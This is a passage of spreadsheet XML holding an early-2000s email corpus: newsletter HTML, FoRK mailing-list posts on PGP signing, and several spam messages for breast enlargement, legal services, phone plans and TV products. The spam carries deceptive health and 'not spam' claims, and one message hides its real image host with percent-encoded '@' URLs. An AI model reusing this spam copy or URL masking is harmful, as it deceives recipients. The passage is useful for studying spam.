 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=94-rOwNQaIqkcVl6HKJvP4Lr_l90RRR" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;--&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Sony CLIE PEG-T415&lt;/B&gt;&lt;BR&gt;Price recently dropped 33%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=a9-IlqqQpUHKlPCQlEz1k6Ets8MkdRR" &gt;
 			Lowest price: $199&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;Panasonic Palmcorder PV-DV901&lt;/B&gt;&lt;BR&gt;Price recently dropped 19%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=be-B7RxQCpFUP7gXfmb0SFO9obmgsRR" &gt;
 			Lowest price: $699&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;Apple iPod (10 GB)&lt;/B&gt;&lt;BR&gt;Price recently dropped 29%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=d3-GZokQJP463kCh6IKqizz_bvmD9RR" &gt;
 			Lowest price: $349&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that ChannelOnline gives you the tools you need to 
 quickly search through your customer profiles?
 &lt;P&gt;
 ChannelOnline provides you with drop-down menus that allow you 
 to search through your customer base with the click of a button. 
 Quickly view which customers each sales rep takes care of or 
 when a customer was last added to your database, or search on 
 a combination of both. Find the customer profile you need to 
 create new quotes and keep your business growing. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOzMQfkjpfIpm0er3eawzuOz99RR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to have organized, detailed customer information 
 at your fingertips.
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXOMQgOQ_eydVeXOlOTqYy_5vRRR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxvZI3XPQkiR3FVswKJxM-Bs7sRR" &gt;Acer brings P4 power to the people - read the review at ZDNet. &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=28-A2VXIRdagHvBlF9EEjTTkeXnQsRR" &gt;Download Builder.com's 'Remedial XML' series.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi4NIbza6U6z4S4vsr2pphySc9RR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUQoIrJ9Id2BZM4MPgY_vq_grRRR" &gt;Tech Update: Put a lid on CRM costs with self-service.  &lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnOkIOEkRitws-lWuDn_nV87EdRR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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href='http://nl.com.com/servlet/url_login?email=belliott@fsl.com&amp;brand=zdnet'&gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;belliott@fsl.com&lt;/font&gt;&lt;/font&gt;
       &lt;p&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt; 
         &lt;a NOTRACK href='http://clickthru.online.com/Click?q=7d-FFqqzGLkMoNg-I4KVtBF-RzAZUhc'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=belliott@fsl.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=92-ubiVQTzF9qB_xtHzfcHBRmcOKsRR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a7-fRT2Q8BskGM75xHLTqAUVzD7w9RR"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href="http://clickthru.online.com/Click?q=bc-zkZJQ6BMuiBrVFXmmG9X-jKhgRRR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=d1-ulDzQpEQ0M7Hidx1nAm3JVYhVdRR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=e7-2y8GQmVceHvdCDUV7YYYzNVRtsRR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fc-WpomQVwTaFFW4xuatAWSFa0Sv9RR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=11-l8ciI2-aP8sfpx5XA0eIxBHH7RRR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=26-KqZVIiMxeeyWsSyBpHmipLyb8RRR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhmVINdxKg2ILoZFWFdDr-9UXdRR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=50-M_6BIR0cwc0i3raAGIPyQMCfzsRR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=65-K83zIDP9dvrNCK_DqVfym6LQE9RR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=7778260&amp;NL=e505&amp;ISSUE=2002-07-26" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=7b-prt_n3ZKg9pVoT7Nkll-1I7w"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ()ż кƼ ʴմϴ
</t>
  </si>
  <si>
    <t xml:space="preserve">PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVu
 dD0idGV4dC9odG1sOyBjaGFyc2V0PWV1Yy1rciI+DQo8dGl0bGU+vcW8scfRIMPQutIgxsTG
 vL+hIMPKtOsgx9W0z7TZPC90aXRsZT4NCjxtZXRhIG5hbWU9ImdlbmVyYXRvciIgY29udGVu
 dD0iTmFtbyBXZWJFZGl0b3IgdjUuMCI+DQo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29u
 dGVudD0iueiw5iCx17iywMwgwNa0wiDAzLjewM8gxu3B9rimILi4tey0z7TZLiI+DQo8L2hl
 YWQ+PGJvZHkgYmdjb2xvcj0id2hpdGUiIHRleHQ9ImJsYWNrIiBsaW5rPSJibHVlIiB2bGlu
 az0icHVycGxlIiBhbGluaz0icmVkIiBiYWNrZ3JvdW5kPSIzMDdfc3RhcjEuZ2lmIj4NCjxw
 PiZuYnNwOzwvcD4NCjx0YWJsZSBhbGlnbj0iY2VudGVyIiBib3JkZXI9IjAiIHdpZHRoPSI0
 OTAiPg0KPHRyPg0KPHRkIHdpZHRoPSI5NzciPg0KPHAgc3R5bGU9ImZvbnQtZmFtaWx5OrG8
 uLLDvCxmYW50YXN5OyBmb250LXNpemU6MTU7IGNvbG9yOmJsYWNrOyB0ZXh0LWRlY29yYXRp
 b246Ymxpbms7IGJhY2tncm91bmQtY29sb3I6eWVsbG93OyIgYWxpZ249ImNlbnRlciI+PGZv
 bnQgc2l6ZT0iNSI+vcW8scfRDQrD0LrSIMbExry/oSDDyrTrIMfVtM+02TwvZm9udD48L3A+
 DQo8cCBzdHlsZT0iZm9udC1mYW1pbHk6sby4ssO8LGZhbnRhc3k7IGZvbnQtc2l6ZToxNTsg
 Y29sb3I6YmxhY2s7IHRleHQtZGVjb3JhdGlvbjpibGluazsgYmFja2dyb3VuZC1jb2xvcjp5
 ZWxsb3c7IiBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSI1Ij4mbmJzcDs8L2ZvbnQ+PC9w
 Pg0KPHA+Jm5ic3A7w9C60iDAzLqlxq64piC7/bCix9gguri8zLOqv+Q/PC9wPg0KPHA+u/a0
 2bilILCotb/AuyDA/MfYuriw7SC9zbTZsbi/5D88L3A+DQo8cD6/qbHiv6EgJm5ic3A7wfax
 3bHuwfYgtMCyuLq4wfYguPjH37T4IL3FvLHH0SC+xsDMtfC+7rChIMDWvcC0z7TZPC9wPg0K
 PHA+fsH3waIgv/jHz7TCILHbvr64piC94SCzqsW4s6qw1MfPtMIguN69w8H2w8o8L3A+DQo8
 cD5+x8+zqr+hIMGhyK3Hz7jpIDE5sLOwoSC1v73Dv6EgwaHIrbXHtMIgv6yw4cPKPC9wPg0K
 PHA+frW2xq/H0SDH4sC4t84guLbAvcC7ILPswMy0wiDFqbiuvbrFuyC3pcfBLi4uPC9wPg0K
 PHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7PGEgaHJlZj0iaHR0cDovL3d3dy5oaWFydC5uZXQiPmh0dHA6Ly93d3cuaGlhcnQu
 bmV0PC9hPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4NCjxwPiZuYnNwO8H2
 sd0guea5rsfPvcO46SDGr7qwILvnwLrHsLW1ILXluLO0z7TZPC9wPg0KPHA+Jm5ic3A7PC9w
 Pg0KPHA+u+fA/CC1v8DHvvjAzCC43sDPwLsgud+828fRwaEgtOu03Mj3IMHLvNvH1bTPtNk8
 L3A+DQo8cD66u7jewM/AuiDH0bn4uLggud+827XHtMIgwM/IuL/rwMy5x7fOILz2vcWwxbrO
 sKEgx8q/5L74vcC0z7TZPC9wPg0KPHA+Jm5ic3A7PC9wPg0KPC90ZD4NCjwvdHI+DQo8L3Rh
 YmxlPg0KPHA+Jm5ic3A7PC9wPg0KPC9ib2R5Pg0KPC9odG1sPg0K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</si>
  <si>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Bigger, Fuller Breasts Naturally In Just Weeks.......                         mwnk
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;&lt;/head&gt;
 &lt;body bgcolor = pink&gt;
 &lt;b&gt;For women ages 13 to 60 plus....&lt;/b&gt; 
 &lt;BR&gt;&lt;BR&gt;As seen on TV....
 &lt;BR&gt;Safely Make Your Breasts
 &lt;BR&gt;Bigger and Fuller 
 &lt;BR&gt;In the privacy of your own home.
 &lt;BR&gt;&lt;BR&gt;&lt;B&gt;Guaranteed quick results&lt;/B&gt;
 &lt;a href = "http://209.210.237.195/indexqb.html" 
 OnMouseover="window.status='Bigger, Fuller Breasts!';return true" 
 OnMouseout="window.status='Bigger Breasts Naturally!';return true" 
 OnMouseDown="window.status='Bigger Breasts In Just Weeks!';return true" 
 OnMouseDown="window.status='Bigger Breasts As Seen On TV!';return true" 
 OnClick="window.status='Bigger Breasts Without Surgery!!!';return true"&gt;
 Click Here For Full Report&lt;/a&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ugwwlrlujryqgveswijfmhb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</si>
  <si>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."ANNOUNCING" Legal Services for Just Pennies A Day!........
</t>
  </si>
  <si>
    <t xml:space="preserve">Fighting a Traffic Ticket?  Going through a Divorce?
 You need an Attorney!
 Take care of all your Legal needs for just pennies day.
 Finally-Affordable Legal Services!
 Send a email for more information THERE IS NO OBLIGATION
 (SERIOUS ENQUIRIES ONLY)
 ***Please include Name &amp; Phone # OR Info will not be Sent.***
                Email to: greatbizz115@yahoo.com
           Put LEGAL ASSISTANCE In the Subject
 ________________________________________________ 
 DISCLAIMER: 
 ======================================== 
 NOTE: This e-mail is not Spam. You are receiving this 
 e-mail because you have previously requested more info on a 
 Business Opportunity or we have shared same opt-in or safe 
 e-mail list or we have exchanged business opportunities in the 
 past. If you are no longer interested in exchanging business 
 opportunities, please send to the email below
 rem876@yahoo.com    
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 On Sun, 11 Aug 2002, Gordon Mohr wrote:
 &gt; &gt; Users don't like entering passphrases when sending email. USB fobs, smart 
 &gt; &gt; cards or other removable hardware are not yet widespread.
 &gt; 
 &gt; Bad assumption.
 Not really. If code can sign stuff without me being aware of it that
 pretty much invalidates the (already tenuous, since it assumes me trusting
 the contents of the frame buffer) concept of a digital signature.
 A secure piece of hardware puts the keyring outside of any code's reach.  
 The key never leaves the hardware compartment. I have to mechanically
 acknowledge a signing process. The cryto fob then falls back to the
 default state: locked.
 &gt; A reasonable UI would have me enter my passphrase *at most* each 
 &gt; time I launch my mail program -- never more than once per day,
 &gt; sometimes once per week. 
 I'm pretty comfortable with entering my passphrase every time. This is not 
 production key, as I usually access my home box via a SSH session, and SSH 
 sessions are easily attackable with a model of your typing pattern. So 
 don't expect me to announce my plutonium shipments via this medium.
 &gt; For some of myy workstations, I'd even be happy with the necessary
 &gt; signing key being cached on disk, so signing is automatic when I
 &gt; hit 'send'.
 &gt; 
 &gt; If spammer code can read my local hard disk, I have bigger problems
 &gt; than spoofed spam.
 I agree. Nevertheless, a number of people who use cryptography have their 
 machines compromised. 
 - -- Eugen* Leitl &lt;a href="http://leitl.org"&gt;leitl&lt;/a&gt;
 ______________________________________________________________
 ICBMTO: N48 04'14.8'' E11 36'41.2'' http://leitl.org
 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9VtLFqlgOiYPlygIRAlRGAJ9MbPmjQESIqXD0g43aVgsLFcESSQCePf8x
 smDzFndB40MbQMv0l3yzMoY=
 =acss
 -----END PGP SIGNATURE-----
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Russell Turpin wrote:
 &gt;Invite her for an afternoon cruise under the Golden Gate bridge in
 &gt;your Stonehorse day sailor.
 Sounds good.
 &gt;Under way, ask her if she'd like to take the stick.
 Whoah!  That's a rather direct approach!
 R. A. Hettinga quoted:
 &gt;From: Somebody
 &gt;[...] what I did in 1983 was to rent a plane from the Moffett Field
 &gt;flying club and take her on an aerial tour
 Sounds great.
 &gt;I can't recall whether or not I gave her any stick time.
 Can't remember if he's in the mile-high club?  Even worse!!!
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Flat-Rate Unlimited Domestic Calling?
 How does it work?
 &gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?
 * What are the limits?
 The service is only for Voice communication, FAX or data transmissions are not supported. This is for normal residential or small business use. The only thing we ask is that you register your line correctly. If you register as a residence and it is determined that the service has been used as a business we cannot continue to offer you the service.
 What's the price?
 The price of the service is determined by the available access number. With a local access number the residential service is $43.00. If we only offer toll free (800) access in your area then residential service is $63.00. No hidden fees, just one low monthly rate billed to your credit card or drafted from your bank account.
 What calling charges are covered?
 This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...
 One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!
 To purchase this product, click on:
 http://www.internationalfreecall.com
 To take a 60 minute trial of this product, send your phone number to:
 8228519@archwireless.net
 To remove yourself from this mailing list, click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1543
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Homeland Alert for the paranoid in you
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482231
 Date: Not supplied
 Homeland Alert is an OS X app that puts a little beacon in your menubar, 
 telling you what the current nationwide alert status is -- just in case you 
 don't have enough free-floating anxiety in your life. Link[1] Discuss[2] (_
 Thanks, Jon[3]!_)
 [1] http://www.exittoshell.com/products/
 [2] http://www.quicktopic.com/boing/H/G4yCjfq37i2
 [3] http://www.talkstink.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;
 &gt;
 &gt; For toddlers, pressing play must cause the music to start immediately,
 &gt; within half a second, for the toddler to get the causality and not press
 the
 &gt; button multiple times.
 Or some sound indicating that the music will start real soon now.
 &gt; As well, pressing the button multiple times shouldn't
 &gt; change the semantics, like an elevator button. No matter how many times
 you
 &gt; press, the elevator still comes to that floor. The play button needs to be
 &gt; the same.
 Idempotency everywhere you look...
 &gt; What would the ideal toddler CD player be like? It would immediately start
 &gt; playing a CD after it was loaded.
 It'd be an MP3 player with solid state storage... instant on.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Online TV Deals                312
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;p align=3D"center"&gt;&lt;font face=3D"Arial Black" color=3D"#FF0000" size=3D"5=
 "&gt;Internet
 Exclusive -- TV Deals&lt;/font&gt;&lt;br&gt;
 &lt;font face=3D"Arial Black" color=3D"#0000FF"&gt;Fantastic Prices&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font color=3D"#000000" face=3D"Arial" size=3D"1"&gt;Clic=
 k any Product
 for Details&lt;/font&gt;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
 						 &lt;tr&gt;
 						 &lt;td width=3D"359"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%=
 40w%77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/=
 featuredproducts.gif" width=3D"359" height=3D"26"&gt;&lt;/td&gt;
 						 &lt;/tr&gt;
 						 &lt;tr bgcolor=3D"#FD2A00"&gt; 
 						 &lt;td width=3D"359"&gt;
 						 &lt;table width=3D"100%" border=3D"0" cellspacing=3D"1" cellpadding=3D=
 "3"&gt;
 						 &lt;tr bgcolor=3D"#FFFFFF"&gt; 
 						 &lt;td align=3D"center"&gt;           
 						 &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1" col=
 or=3D"#FFFFFF"&gt;
 						 &lt;table border=3D"0" cellpadding=3D"1" cellspacing=3D"0" width=3D"10=
 0%"&gt;
 						 &lt;tr&gt;
 							&lt;td align=3D"center"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial=
 , Helvetica, sans-serif" size=3D"1"&gt;&lt;a href=3D"http://www.myratedoctor.com=
 /tvdeals/index1.html"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/ama=
 zingprofitstn.gif" border=3D"0" width=3D"94" height=3D"60"&gt;&lt;br&gt;AMAZING PRO=
 FITS BY JOHN BECK&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial=
 , Helvetica, sans-serif" size=3D"1"&gt;&lt;a href=3D"http://www.myratedoctor.com=
 /tvdeals/index1.html"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/Ava=
 cortn.gif" border=3D"0" width=3D"60" height=3D"62"&gt;&lt;br&gt;AVACOR HAIR CARE SY=
 STEM&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial=
 , Helvetica, sans-serif" size=3D"1"&gt;&lt;a href=3D"http://www.myratedoctor.com=
 /tvdeals/index1.html"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/bal=
 ancebracelettn.gif" border=3D"0" width=3D"66" height=3D"60"&gt;&lt;br&gt;BALANCE BR=
 ACELET&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 							&lt;/tr&gt;&lt;tr&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/bot=
 ptn.gif" border=3D"0" width=3D"60" height=3D"48"&gt;&lt;br&gt;BLAST OFF THE POUNDS =
 BY RICHARD SIMMONS&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/blo=
 ussanttn.gif" border=3D"0" width=3D"55" height=3D"96"&gt;&lt;br&gt;BLOUSSANT&lt;/font&gt;=
 &lt;/a&gt;&lt;/td&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/cyb=
 ersonictn.gif" border=3D"0" width=3D"51" height=3D"114"&gt;&lt;br&gt;CYBERSONIC TOO=
 THBRUSH&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 							&lt;/tr&gt;&lt;tr&gt;
 							&lt;td align=3D"center"&gt;&lt;a href=3D"http://www.myratedoctor.com/tvdeals=
 /index1.html"&gt;&lt;font color=3D"#000000" face=3D"Verdana, Arial, Helvetica, s=
 ans-serif" size=3D"1"&gt;&lt;img src=3D"http://www.InterstingProducts777.com%40w=
 %77%77%2E%74%65%72%72%61%2Ee%73/p%65r%73%6F%6E%61%6C%39/%35%300%31%308/fla=
 thosetn.gif" border=3D"0" width=3D"80" height=3D"60"&gt;&lt;br&gt;FLAT HOSE - 50FT&lt;=
